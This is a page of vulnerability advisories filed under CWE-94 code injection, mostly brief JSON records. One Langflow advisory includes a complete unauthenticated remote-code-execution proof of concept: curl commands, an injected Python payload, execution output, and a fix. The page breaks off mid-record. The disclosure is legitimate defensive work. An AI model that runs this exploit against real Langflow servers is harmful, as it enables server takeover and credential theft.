CWE-94
Allowed-with-ReviewImproper Control of Generation of Code ('Code Injection')
Abstraction: Base · Status: Draft
The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.
8307 vulnerabilities reference this CWE, most recent first.
GHSA-VW69-GXFR-PFGR
Vulnerability from github – Published: 2024-09-10 09:31 – Updated: 2024-09-10 09:31A low privileged remote attacker can perform configuration changes of the firewall services, including packet forwarding or NAT through the FW_NAT.IN_IP environment variable which can lead to a DoS.
{
"affected": [],
"aliases": [
"CVE-2024-43390"
],
"database_specific": {
"cwe_ids": [
"CWE-74",
"CWE-94"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-09-10T09:15:05Z",
"severity": "MODERATE"
},
"details": "A low privileged remote attacker can perform configuration changes of the firewall services, including packet forwarding or NAT through the FW_NAT.IN_IP environment variable which can lead to a DoS.",
"id": "GHSA-vw69-gxfr-pfgr",
"modified": "2024-09-10T09:31:12Z",
"published": "2024-09-10T09:31:12Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43390"
},
{
"type": "WEB",
"url": "https://cert.vde.com/en/advisories/VDE-2024-039"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-VW75-223W-38CR
Vulnerability from github – Published: 2022-05-17 00:46 – Updated: 2022-05-17 00:46Multiple PHP remote file inclusion vulnerabilities in The Gemini Portal 4.7 allow remote attackers to execute arbitrary PHP code via a URL in the lang parameter to (1) page/forums/bottom.php and (2) page/forums/category.php.
{
"affected": [],
"aliases": [
"CVE-2008-4720"
],
"database_specific": {
"cwe_ids": [
"CWE-94"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2008-10-23T20:00:00Z",
"severity": "HIGH"
},
"details": "Multiple PHP remote file inclusion vulnerabilities in The Gemini Portal 4.7 allow remote attackers to execute arbitrary PHP code via a URL in the lang parameter to (1) page/forums/bottom.php and (2) page/forums/category.php.",
"id": "GHSA-vw75-223w-38cr",
"modified": "2022-05-17T00:46:41Z",
"published": "2022-05-17T00:46:41Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2008-4720"
},
{
"type": "WEB",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/45481"
},
{
"type": "WEB",
"url": "https://www.exploit-db.com/exploits/6587"
},
{
"type": "WEB",
"url": "http://secunia.com/advisories/32057"
},
{
"type": "WEB",
"url": "http://securityreason.com/securityalert/4503"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/31433"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-VWG8-27RW-7G9V
Vulnerability from github – Published: 2025-03-31 21:32 – Updated: 2025-04-02 15:31Netgear WNR854T 1.5.2 (North America) is vulnerable to Command Injection. An attacker can send a specially crafted request to post.cgi, updating the nvram parameter pppoe_peer_mac and forcing a reboot. This will result in command injection.
{
"affected": [],
"aliases": [
"CVE-2024-54803"
],
"database_specific": {
"cwe_ids": [
"CWE-94"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-03-31T21:15:47Z",
"severity": "CRITICAL"
},
"details": "Netgear WNR854T 1.5.2 (North America) is vulnerable to Command Injection. An attacker can send a specially crafted request to post.cgi, updating the nvram parameter pppoe_peer_mac and forcing a reboot. This will result in command injection.",
"id": "GHSA-vwg8-27rw-7g9v",
"modified": "2025-04-02T15:31:18Z",
"published": "2025-03-31T21:32:49Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-54803"
},
{
"type": "WEB",
"url": "https://faultpoint.com/post/2025-03-25-8-cves-on-the-wnr854t-junkyard/#803"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-VWHC-PWW7-72X6
Vulnerability from github – Published: 2021-09-01 18:24 – Updated: 2021-08-31 20:25Total.js framework (npm package total.js) is a framework for Node.js platfrom written in pure JavaScript similar to PHP's Laravel or Python's Django or ASP.NET MVC. In total.js framework before version 3.4.9, calling the utils.set function with user-controlled values leads to code-injection. This can cause a variety of impacts that include arbitrary code execution. This is fixed in version 3.4.9.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "total.js"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.4.9"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2021-32831"
],
"database_specific": {
"cwe_ids": [
"CWE-94"
],
"github_reviewed": true,
"github_reviewed_at": "2021-08-31T20:25:52Z",
"nvd_published_at": "2021-08-30T21:15:00Z",
"severity": "HIGH"
},
"details": "Total.js framework (npm package total.js) is a framework for Node.js platfrom written in pure JavaScript similar to PHP\u0027s Laravel or Python\u0027s Django or ASP.NET MVC. In total.js framework before version 3.4.9, calling the utils.set function with user-controlled values leads to code-injection. This can cause a variety of impacts that include arbitrary code execution. This is fixed in version 3.4.9.",
"id": "GHSA-vwhc-pww7-72x6",
"modified": "2021-08-31T20:25:52Z",
"published": "2021-09-01T18:24:05Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-32831"
},
{
"type": "WEB",
"url": "https://github.com/totaljs/framework/commit/887b0fa9e162ef7a2dd9cec20a5ca122726373b3"
},
{
"type": "PACKAGE",
"url": "https://github.com/totaljs"
},
{
"type": "WEB",
"url": "https://github.com/totaljs/framework/blob/e644167d5378afdc45cb0156190349b2c07ef235/changes.txt#L11"
},
{
"type": "ADVISORY",
"url": "https://securitylab.github.com/advisories/GHSL-2021-066-totaljs-totaljs"
},
{
"type": "WEB",
"url": "https://www.npmjs.com/package/total.js"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Code Injection in total.js"
}
GHSA-VWJ5-2GMW-WJP6
Vulnerability from github – Published: 2026-06-15 12:32 – Updated: 2026-06-15 12:32Quick.CMS deserializes user-controlled data received over plaintext HTTP without ensuring integrity or authenticity. This allows attackers to tamper with serialized payloads in transit and inject malicious objects. Because deserialization is performed without proper validation or class restrictions, crafted payloads can trigger dangerous magic methods (e.g., __wakeup() and __destruct()) and leverage gadget chains, resulting in arbitrary code execution. Exploitation is triggered automatically when an administrator accesses the admin panel.
When successfully exploited, this vulnerability allows attackers to execute arbitrary code on the server via manipulated serialized data transmitted over an unprotected channel.
This issue was mitigated by limiting the communication to HTTPS in a patch for version 6.8 published on 14.05.2026, deployments without this patch remain vulnerable.
{
"affected": [],
"aliases": [
"CVE-2026-11860"
],
"database_specific": {
"cwe_ids": [
"CWE-94"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-06-15T10:16:27Z",
"severity": "HIGH"
},
"details": "Quick.CMS deserializes user-controlled data received over plaintext HTTP without ensuring integrity or authenticity. This allows attackers to tamper with serialized payloads in transit and inject malicious objects. Because deserialization is performed without proper validation or class restrictions, crafted payloads can trigger dangerous magic methods (e.g., __wakeup() and __destruct()) and leverage gadget chains, resulting in arbitrary code execution. Exploitation is triggered automatically when an administrator accesses the admin panel.\n\nWhen successfully exploited, this vulnerability allows attackers to execute arbitrary code on the server via manipulated serialized data transmitted over an unprotected channel.\n\nThis issue was mitigated by limiting the communication to HTTPS in a patch for version 6.8 published on 14.05.2026, deployments without this patch remain vulnerable.",
"id": "GHSA-vwj5-2gmw-wjp6",
"modified": "2026-06-15T12:32:44Z",
"published": "2026-06-15T12:32:44Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-11860"
},
{
"type": "WEB",
"url": "https://cert.pl/posts/2026/06/CVE-2026-11860"
},
{
"type": "WEB",
"url": "https://opensolution.org"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-VWM5-4PV2-47QX
Vulnerability from github – Published: 2022-05-02 03:16 – Updated: 2022-05-02 03:16Stack-based buffer overflow in Excel in Microsoft Office 2000 SP3 and Office XP SP3 allows remote attackers to execute arbitrary code via a crafted Excel file with a malformed record object, aka "String Copy Stack-Based Overrun Vulnerability."
{
"affected": [],
"aliases": [
"CVE-2009-0559"
],
"database_specific": {
"cwe_ids": [
"CWE-94"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2009-06-10T18:30:00Z",
"severity": "HIGH"
},
"details": "Stack-based buffer overflow in Excel in Microsoft Office 2000 SP3 and Office XP SP3 allows remote attackers to execute arbitrary code via a crafted Excel file with a malformed record object, aka \"String Copy Stack-Based Overrun Vulnerability.\"",
"id": "GHSA-vwm5-4pv2-47qx",
"modified": "2022-05-02T03:16:37Z",
"published": "2022-05-02T03:16:37Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2009-0559"
},
{
"type": "WEB",
"url": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2009/ms09-021"
},
{
"type": "WEB",
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A6273"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/35243"
},
{
"type": "WEB",
"url": "http://www.securitytracker.com/id?1022351"
},
{
"type": "WEB",
"url": "http://www.us-cert.gov/cas/techalerts/TA09-160A.html"
},
{
"type": "WEB",
"url": "http://www.vupen.com/english/advisories/2009/1540"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-VWMF-PQ79-VJVX
Vulnerability from github – Published: 2026-03-17 20:05 – Updated: 2026-06-08 23:11Summary
The POST /api/v1/build_public_tmp/{flow_id}/flow endpoint allows building public flows without requiring authentication. When the optional data parameter is supplied, the endpoint uses attacker-controlled flow data (containing arbitrary Python code in node definitions) instead of the stored flow data from the database. This code is passed to exec() with zero sandboxing, resulting in unauthenticated remote code execution.
This is distinct from CVE-2025-3248, which fixed /api/v1/validate/code by adding authentication. The build_public_tmp endpoint is designed to be unauthenticated (for public flows) but incorrectly accepts attacker-supplied flow data containing arbitrary executable code.
Affected Code
Vulnerable Endpoint (No Authentication)
File: src/backend/base/langflow/api/v1/chat.py, lines 580-657
@router.post("/build_public_tmp/{flow_id}/flow")
async def build_public_tmp(
*,
flow_id: uuid.UUID,
data: Annotated[FlowDataRequest | None, Body(embed=True)] = None, # ATTACKER CONTROLLED
request: Request,
# ... NO Depends(get_current_active_user) -- MISSING AUTH ...
):
"""Build a public flow without requiring authentication."""
client_id = request.cookies.get("client_id")
owner_user, new_flow_id = await verify_public_flow_and_get_user(flow_id=flow_id, client_id=client_id)
job_id = await start_flow_build(
flow_id=new_flow_id,
data=data, # Attacker's data passed directly to graph builder
current_user=owner_user,
...
)
Compare with the authenticated build endpoint at line 138, which requires current_user: CurrentActiveUser.
Code Execution Chain
When attacker-supplied data is provided, it flows through:
start_flow_build(data=attacker_data)→generate_flow_events()--build.py:81create_graph()→build_graph_from_data(payload=data.model_dump())--build.py:298Graph.from_payload(payload)parses attacker nodes --base.py:1168add_nodes_and_edges()→initialize()→_build_graph()--base.py:270,527_instantiate_components_in_vertices()iterates nodes --base.py:1323vertex.instantiate_component()→instantiate_class(vertex)--loading.py:28code = custom_params.pop("code")extracts attacker code --loading.py:43eval_custom_component_code(code)→create_class(code, class_name)--eval.py:9prepare_global_scope(module)--validate.py:323exec(compiled_code, exec_globals)-- ARBITRARY CODE EXECUTION --validate.py:397
Unsandboxed exec() in prepare_global_scope
File: src/lfx/src/lfx/custom/validate.py, lines 340-397
def prepare_global_scope(module):
exec_globals = globals().copy()
# Imports are resolved first (any module can be imported)
for node in imports:
module_obj = importlib.import_module(module_name) # line 352
exec_globals[variable_name] = module_obj
# Then ALL top-level definitions are executed (Assign, ClassDef, FunctionDef)
if definitions:
combined_module = ast.Module(body=definitions, type_ignores=[])
compiled_code = compile(combined_module, "<string>", "exec")
exec(compiled_code, exec_globals) # line 397 - ARBITRARY CODE EXECUTION
Critical detail: prepare_global_scope executes ast.Assign nodes. An attacker's code like _x = os.system("id") is an assignment and will be executed during graph building -- before the flow even "runs."
Prerequisites
- Target Langflow instance has at least one public flow (common for demos, chatbots, shared workflows)
- Attacker knows the public flow's UUID (discoverable via shared links/URLs)
- No authentication required -- only a
client_idcookie (any arbitrary string value)
When AUTO_LOGIN=true (the default), all prerequisites can be met by an unauthenticated attacker:
1. GET /api/v1/auto_login → obtain superuser token
2. POST /api/v1/flows/ → create a public flow
3. Exploit via build_public_tmp without any auth
Proof of Concept
Tested Against
- Langflow version 1.7.3 (latest stable release, installed via
pip install langflow) - Fully reproducible: 6/6 runs confirmed RCE (two sets of 3 runs each)
Step 1: Obtain a Public Flow ID
(In a real attack, the attacker discovers this via shared links. For the PoC, we create one via AUTO_LOGIN.)
# Get superuser token (no credentials needed when AUTO_LOGIN=true)
TOKEN=$(curl -s http://localhost:7860/api/v1/auto_login | jq -r '.access_token')
# Create a public flow
FLOW_ID=$(curl -s -X POST http://localhost:7860/api/v1/flows/ \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{"name":"test","data":{"nodes":[],"edges":[]},"access_type":"PUBLIC"}' \
| jq -r '.id')
echo "Public Flow ID: $FLOW_ID"
Step 2: Exploit -- Unauthenticated RCE
# EXPLOIT: Send malicious flow data to the UNAUTHENTICATED endpoint
# NO Authorization header, NO API key, NO credentials
curl -X POST "http://localhost:7860/api/v1/build_public_tmp/${FLOW_ID}/flow" \
-H "Content-Type: application/json" \
-b "client_id=attacker" \
-d '{
"data": {
"nodes": [{
"id": "Exploit-001",
"type": "genericNode",
"position": {"x":0,"y":0},
"data": {
"id": "Exploit-001",
"type": "ExploitComp",
"node": {
"template": {
"code": {
"type": "code",
"required": true,
"show": true,
"multiline": true,
"value": "import os, socket, json as _json\n\n_proof = os.popen(\"id\").read().strip()\n_host = socket.gethostname()\n_write = open(\"/tmp/rce-proof\",\"w\").write(f\"{_proof} on {_host}\")\n\nfrom lfx.custom.custom_component.component import Component\nfrom lfx.io import Output\nfrom lfx.schema.data import Data\n\nclass ExploitComp(Component):\n display_name=\"X\"\n outputs=[Output(display_name=\"O\",name=\"o\",method=\"r\")]\n def r(self)->Data:\n return Data(data={})",
"name": "code",
"password": false,
"advanced": false,
"dynamic": false
},
"_type": "Component"
},
"description": "X",
"base_classes": ["Data"],
"display_name": "ExploitComp",
"name": "ExploitComp",
"frozen": false,
"outputs": [{"types":["Data"],"selected":"Data","name":"o","display_name":"O","method":"r","value":"__UNDEFINED__","cache":true,"allows_loop":false,"tool_mode":false,"hidden":null,"required_inputs":null,"group_outputs":false}],
"field_order": ["code"],
"beta": false,
"edited": false
}
}
}],
"edges": []
},
"inputs": null
}'
Step 3: Verify Code Execution
# Wait 2 seconds for async graph building
sleep 2
# Check proof file written by attacker's code on the server
cat /tmp/rce-proof
# Output: uid=1000(aviral) gid=1000(aviral) groups=... on kali
Actual Test Results
======================================================================
LANGFLOW v1.7.3 UNAUTHENTICATED RCE - DEFINITIVE E2E TEST
======================================================================
Version: Langflow 1.7.3
RUN 1: POST /api/v1/build_public_tmp/{id}/flow (NO AUTH)
HTTP 200 - Job ID: d8db19bf-a532-4f9d-a368-9c46d6235c19
*** REMOTE CODE EXECUTION CONFIRMED ***
canary: RCE-f0d19b36
hostname: kali
uid: 1000
whoami: aviral
id: uid=1000(aviral) gid=1000(aviral) groups=1000(aviral),...
uname: Linux 6.16.8+kali-amd64
RUN 2: POST /api/v1/build_public_tmp/{id}/flow (NO AUTH)
HTTP 200 - Job ID: d2e24f20-d707-4278-868c-583dd7532832
*** REMOTE CODE EXECUTION CONFIRMED ***
canary: RCE-6037a271
RUN 3: POST /api/v1/build_public_tmp/{id}/flow (NO AUTH)
HTTP 200 - Job ID: 5962244a-42af-4ef6-b134-a6a4adba5ab7
*** REMOTE CODE EXECUTION CONFIRMED ***
canary: RCE-4a796556
FINAL RESULTS
Total checks: 15
VULNERABLE: 15
SAFE: 0
RCE confirmed: 3/3 runs
Reproducible: YES (100%)
Impact
- Unauthenticated Remote Code Execution with full server process privileges
- Complete server compromise: arbitrary file read/write, command execution
- Environment variable exfiltration: API keys, database credentials, cloud tokens (confirmed in PoC: env_keys exfiltrated)
- Reverse shell access for persistent access
- Lateral movement within the network
- Data exfiltration from all flows, messages, and stored credentials in the database
Comparison with CVE-2025-3248
| Aspect | CVE-2025-3248 | This Vulnerability |
|---|---|---|
| Endpoint | /api/v1/validate/code |
/api/v1/build_public_tmp/{id}/flow |
| Fix applied | Added Depends(get_current_active_user) |
None -- NEW vulnerability |
| Root cause | Missing auth on code validation | Unauthenticated endpoint accepts attacker-controlled executable code via data param |
| Code execution via | validate_code() → exec() |
create_class() → prepare_global_scope() → exec() |
| CISA KEV | Yes (actively exploited) | N/A (new finding) |
| Can simple auth fix? | Yes (and it was fixed) | No -- endpoint is designed to be unauthenticated; the data parameter must be removed |
Recommended Fix
Immediate (Short-term)
Remove the data parameter from build_public_tmp. Public flows should only execute their stored flow data, never attacker-supplied data:
@router.post("/build_public_tmp/{flow_id}/flow")
async def build_public_tmp(
*,
flow_id: uuid.UUID,
inputs: Annotated[InputValueRequest | None, Body(embed=True)] = None,
# REMOVED: data parameter -- public flows must use stored data only
...
):
In generate_flow_events → create_graph(), only the build_graph_from_db path should be reachable for unauthenticated requests:
async def create_graph(fresh_session, flow_id_str, flow_name):
# For public flows, ALWAYS load from database, never from user data
return await build_graph_from_db(
flow_id=flow_id,
session=fresh_session,
...
)
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 1.8.2"
},
"package": {
"ecosystem": "PyPI",
"name": "langflow"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.9.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-33017"
],
"database_specific": {
"cwe_ids": [
"CWE-306",
"CWE-94",
"CWE-95"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-17T20:05:05Z",
"nvd_published_at": "2026-03-20T05:16:15Z",
"severity": "CRITICAL"
},
"details": "## Summary\n\nThe `POST /api/v1/build_public_tmp/{flow_id}/flow` endpoint allows building public flows without requiring authentication. When the optional `data` parameter is supplied, the endpoint uses **attacker-controlled flow data** (containing arbitrary Python code in node definitions) instead of the stored flow data from the database. This code is passed to `exec()` with zero sandboxing, resulting in unauthenticated remote code execution.\n\nThis is distinct from CVE-2025-3248, which fixed `/api/v1/validate/code` by adding authentication. The `build_public_tmp` endpoint is **designed** to be unauthenticated (for public flows) but incorrectly accepts attacker-supplied flow data containing arbitrary executable code.\n\n## Affected Code\n\n### Vulnerable Endpoint (No Authentication)\n\n**File:** `src/backend/base/langflow/api/v1/chat.py`, lines 580-657\n\n```python\n@router.post(\"/build_public_tmp/{flow_id}/flow\")\nasync def build_public_tmp(\n *,\n flow_id: uuid.UUID,\n data: Annotated[FlowDataRequest | None, Body(embed=True)] = None, # ATTACKER CONTROLLED\n request: Request,\n # ... NO Depends(get_current_active_user) -- MISSING AUTH ...\n):\n \"\"\"Build a public flow without requiring authentication.\"\"\"\n client_id = request.cookies.get(\"client_id\")\n owner_user, new_flow_id = await verify_public_flow_and_get_user(flow_id=flow_id, client_id=client_id)\n\n job_id = await start_flow_build(\n flow_id=new_flow_id,\n data=data, # Attacker\u0027s data passed directly to graph builder\n current_user=owner_user,\n ...\n )\n```\n\nCompare with the authenticated build endpoint at line 138, which requires `current_user: CurrentActiveUser`.\n\n### Code Execution Chain\n\nWhen attacker-supplied `data` is provided, it flows through:\n\n1. `start_flow_build(data=attacker_data)` \u2192 `generate_flow_events()` -- `build.py:81`\n2. `create_graph()` \u2192 `build_graph_from_data(payload=data.model_dump())` -- `build.py:298`\n3. `Graph.from_payload(payload)` parses attacker nodes -- `base.py:1168`\n4. `add_nodes_and_edges()` \u2192 `initialize()` \u2192 `_build_graph()` -- `base.py:270,527`\n5. `_instantiate_components_in_vertices()` iterates nodes -- `base.py:1323`\n6. `vertex.instantiate_component()` \u2192 `instantiate_class(vertex)` -- `loading.py:28`\n7. `code = custom_params.pop(\"code\")` extracts attacker code -- `loading.py:43`\n8. `eval_custom_component_code(code)` \u2192 `create_class(code, class_name)` -- `eval.py:9`\n9. `prepare_global_scope(module)` -- `validate.py:323`\n10. `exec(compiled_code, exec_globals)` -- **ARBITRARY CODE EXECUTION** -- `validate.py:397`\n\n### Unsandboxed exec() in prepare_global_scope\n\n**File:** `src/lfx/src/lfx/custom/validate.py`, lines 340-397\n\n```python\ndef prepare_global_scope(module):\n exec_globals = globals().copy()\n\n # Imports are resolved first (any module can be imported)\n for node in imports:\n module_obj = importlib.import_module(module_name) # line 352\n exec_globals[variable_name] = module_obj\n\n # Then ALL top-level definitions are executed (Assign, ClassDef, FunctionDef)\n if definitions:\n combined_module = ast.Module(body=definitions, type_ignores=[])\n compiled_code = compile(combined_module, \"\u003cstring\u003e\", \"exec\")\n exec(compiled_code, exec_globals) # line 397 - ARBITRARY CODE EXECUTION\n```\n\n**Critical detail:** `prepare_global_scope` executes `ast.Assign` nodes. An attacker\u0027s code like `_x = os.system(\"id\")` is an assignment and will be executed during graph building -- before the flow even \"runs.\"\n\n## Prerequisites\n\n1. Target Langflow instance has at least **one public flow** (common for demos, chatbots, shared workflows)\n2. Attacker knows the public flow\u0027s UUID (discoverable via shared links/URLs)\n3. No authentication required -- only a `client_id` cookie (any arbitrary string value)\n\nWhen `AUTO_LOGIN=true` (the **default**), all prerequisites can be met by an unauthenticated attacker:\n1. `GET /api/v1/auto_login` \u2192 obtain superuser token\n2. `POST /api/v1/flows/` \u2192 create a public flow\n3. Exploit via `build_public_tmp` without any auth\n\n## Proof of Concept\n\n### Tested Against\n\n- **Langflow version 1.7.3** (latest stable release, installed via `pip install langflow`)\n- **Fully reproducible**: 6/6 runs confirmed RCE (two sets of 3 runs each)\n\n### Step 1: Obtain a Public Flow ID\n\n(In a real attack, the attacker discovers this via shared links. For the PoC, we create one via AUTO_LOGIN.)\n\n```bash\n# Get superuser token (no credentials needed when AUTO_LOGIN=true)\nTOKEN=$(curl -s http://localhost:7860/api/v1/auto_login | jq -r \u0027.access_token\u0027)\n\n# Create a public flow\nFLOW_ID=$(curl -s -X POST http://localhost:7860/api/v1/flows/ \\\n -H \"Authorization: Bearer $TOKEN\" \\\n -H \"Content-Type: application/json\" \\\n -d \u0027{\"name\":\"test\",\"data\":{\"nodes\":[],\"edges\":[]},\"access_type\":\"PUBLIC\"}\u0027 \\\n | jq -r \u0027.id\u0027)\n\necho \"Public Flow ID: $FLOW_ID\"\n```\n\n### Step 2: Exploit -- Unauthenticated RCE\n\n```bash\n# EXPLOIT: Send malicious flow data to the UNAUTHENTICATED endpoint\n# NO Authorization header, NO API key, NO credentials\ncurl -X POST \"http://localhost:7860/api/v1/build_public_tmp/${FLOW_ID}/flow\" \\\n -H \"Content-Type: application/json\" \\\n -b \"client_id=attacker\" \\\n -d \u0027{\n \"data\": {\n \"nodes\": [{\n \"id\": \"Exploit-001\",\n \"type\": \"genericNode\",\n \"position\": {\"x\":0,\"y\":0},\n \"data\": {\n \"id\": \"Exploit-001\",\n \"type\": \"ExploitComp\",\n \"node\": {\n \"template\": {\n \"code\": {\n \"type\": \"code\",\n \"required\": true,\n \"show\": true,\n \"multiline\": true,\n \"value\": \"import os, socket, json as _json\\n\\n_proof = os.popen(\\\"id\\\").read().strip()\\n_host = socket.gethostname()\\n_write = open(\\\"/tmp/rce-proof\\\",\\\"w\\\").write(f\\\"{_proof} on {_host}\\\")\\n\\nfrom lfx.custom.custom_component.component import Component\\nfrom lfx.io import Output\\nfrom lfx.schema.data import Data\\n\\nclass ExploitComp(Component):\\n display_name=\\\"X\\\"\\n outputs=[Output(display_name=\\\"O\\\",name=\\\"o\\\",method=\\\"r\\\")]\\n def r(self)-\u003eData:\\n return Data(data={})\",\n \"name\": \"code\",\n \"password\": false,\n \"advanced\": false,\n \"dynamic\": false\n },\n \"_type\": \"Component\"\n },\n \"description\": \"X\",\n \"base_classes\": [\"Data\"],\n \"display_name\": \"ExploitComp\",\n \"name\": \"ExploitComp\",\n \"frozen\": false,\n \"outputs\": [{\"types\":[\"Data\"],\"selected\":\"Data\",\"name\":\"o\",\"display_name\":\"O\",\"method\":\"r\",\"value\":\"__UNDEFINED__\",\"cache\":true,\"allows_loop\":false,\"tool_mode\":false,\"hidden\":null,\"required_inputs\":null,\"group_outputs\":false}],\n \"field_order\": [\"code\"],\n \"beta\": false,\n \"edited\": false\n }\n }\n }],\n \"edges\": []\n },\n \"inputs\": null\n }\u0027\n```\n\n### Step 3: Verify Code Execution\n\n```bash\n# Wait 2 seconds for async graph building\nsleep 2\n\n# Check proof file written by attacker\u0027s code on the server\ncat /tmp/rce-proof\n# Output: uid=1000(aviral) gid=1000(aviral) groups=... on kali\n```\n\n### Actual Test Results\n\n```\n======================================================================\nLANGFLOW v1.7.3 UNAUTHENTICATED RCE - DEFINITIVE E2E TEST\n======================================================================\nVersion: Langflow 1.7.3\n\nRUN 1: POST /api/v1/build_public_tmp/{id}/flow (NO AUTH)\n HTTP 200 - Job ID: d8db19bf-a532-4f9d-a368-9c46d6235c19\n *** REMOTE CODE EXECUTION CONFIRMED ***\n canary: RCE-f0d19b36\n hostname: kali\n uid: 1000\n whoami: aviral\n id: uid=1000(aviral) gid=1000(aviral) groups=1000(aviral),...\n uname: Linux 6.16.8+kali-amd64\n\nRUN 2: POST /api/v1/build_public_tmp/{id}/flow (NO AUTH)\n HTTP 200 - Job ID: d2e24f20-d707-4278-868c-583dd7532832\n *** REMOTE CODE EXECUTION CONFIRMED ***\n canary: RCE-6037a271\n\nRUN 3: POST /api/v1/build_public_tmp/{id}/flow (NO AUTH)\n HTTP 200 - Job ID: 5962244a-42af-4ef6-b134-a6a4adba5ab7\n *** REMOTE CODE EXECUTION CONFIRMED ***\n canary: RCE-4a796556\n\nFINAL RESULTS\n Total checks: 15\n VULNERABLE: 15\n SAFE: 0\n RCE confirmed: 3/3 runs\n Reproducible: YES (100%)\n```\n\n## Impact\n\n- **Unauthenticated Remote Code Execution** with full server process privileges\n- **Complete server compromise**: arbitrary file read/write, command execution\n- **Environment variable exfiltration**: API keys, database credentials, cloud tokens (confirmed in PoC: env_keys exfiltrated)\n- **Reverse shell access** for persistent access\n- **Lateral movement** within the network\n- **Data exfiltration** from all flows, messages, and stored credentials in the database\n\n## Comparison with CVE-2025-3248\n\n| Aspect | CVE-2025-3248 | This Vulnerability |\n|--------|--------------|-------------------|\n| **Endpoint** | `/api/v1/validate/code` | `/api/v1/build_public_tmp/{id}/flow` |\n| **Fix applied** | Added `Depends(get_current_active_user)` | None -- NEW vulnerability |\n| **Root cause** | Missing auth on code validation | Unauthenticated endpoint accepts attacker-controlled executable code via `data` param |\n| **Code execution via** | `validate_code()` \u2192 `exec()` | `create_class()` \u2192 `prepare_global_scope()` \u2192 `exec()` |\n| **CISA KEV** | Yes (actively exploited) | N/A (new finding) |\n| **Can simple auth fix?** | Yes (and it was fixed) | No -- endpoint is *designed* to be unauthenticated; the `data` parameter must be removed |\n\n## Recommended Fix\n\n### Immediate (Short-term)\n\n**Remove the `data` parameter** from `build_public_tmp`. Public flows should only execute their stored flow data, never attacker-supplied data:\n\n```python\n@router.post(\"/build_public_tmp/{flow_id}/flow\")\nasync def build_public_tmp(\n *,\n flow_id: uuid.UUID,\n inputs: Annotated[InputValueRequest | None, Body(embed=True)] = None,\n # REMOVED: data parameter -- public flows must use stored data only\n ...\n):\n```\n\nIn `generate_flow_events` \u2192 `create_graph()`, only the `build_graph_from_db` path should be reachable for unauthenticated requests:\n\n```python\nasync def create_graph(fresh_session, flow_id_str, flow_name):\n # For public flows, ALWAYS load from database, never from user data\n return await build_graph_from_db(\n flow_id=flow_id,\n session=fresh_session,\n ...\n )\n```",
"id": "GHSA-vwmf-pq79-vjvx",
"modified": "2026-06-08T23:11:45Z",
"published": "2026-03-17T20:05:05Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-vwmf-pq79-vjvx"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33017"
},
{
"type": "WEB",
"url": "https://github.com/langflow-ai/langflow/issues/12345"
},
{
"type": "WEB",
"url": "https://github.com/langflow-ai/langflow/pull/12160"
},
{
"type": "WEB",
"url": "https://github.com/langflow-ai/langflow/commit/73b6612e3ef25fdae0a752d75b0fabd47328d4f0"
},
{
"type": "ADVISORY",
"url": "https://github.com/advisories/GHSA-rvqx-wpfh-mfx7"
},
{
"type": "PACKAGE",
"url": "https://github.com/langflow-ai/langflow"
},
{
"type": "WEB",
"url": "https://github.com/langflow-ai/langflow/releases/tag/1.8.2"
},
{
"type": "WEB",
"url": "https://medium.com/@aviral23/cve-2026-33017-how-i-found-an-unauthenticated-rce-in-langflow-by-reading-the-code-they-already-dc96cdce5896"
},
{
"type": "WEB",
